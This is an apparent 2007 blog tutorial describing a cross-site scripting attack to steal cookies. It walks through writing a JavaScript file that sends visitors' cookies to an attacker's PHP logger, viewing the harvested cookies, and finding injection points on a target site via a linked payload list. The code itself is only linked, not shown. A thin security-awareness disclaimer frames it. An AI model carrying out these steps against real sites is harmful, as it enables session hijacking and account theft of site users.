Note:

This is a tutorial showing you how this is done so you are aware of how it is done, so you can secure your site and make sure it does not happen to you!

About:

XSS is done by people putting codes into a website which runs on the webpage when a user does a specific event. Typically, people attempt to steal cookies in this manner, and this is all I’m going to show, but other things can be stolen, and some other codes could be ran through a javascript file.

How To:

1. Create your javascript file, xss.js. An example is here it connects to your grabcookie.php file and includes the users cookie in the URL.
2. You obviously need your grabcookie.php file. Your grabcookie.php file is what saves the cookie. You can view my code here which uses the GET function to retrieve to cookie from the URL. It then adds the cookie and other items together and formats them, and then adds them to a current log file, cookiejar.php.
3. Now how are the cookies accessed? Simple. Connect to your webpage at “http://www.site.com/cookies/cookiejar.php”. Here is where all the cookies are saved to
4. Now you just need to find a exploit in the site to request to their .js (javascript) file, which then runs its code. A list of some exploits can be found on this site, ” http://ha.ckers.org/xss.html”. Of course, there are many others too, but that would be a start for you. A great web page scanner for you to check out is Acunetix Web Vulnerability Scanner 4. It scans the webpage for many exploits and bugs. Scan your site and then secure the bugs to prevent any xss attacks on your site.

This has been a tutorial from Venom

This entry was posted on Sunday, May 13th, 2007 at 11:02 pm and is filed under Technology.You can follow any responses to this entry through the RSS 2.0 feed.You can leave a response, or trackback from your own site.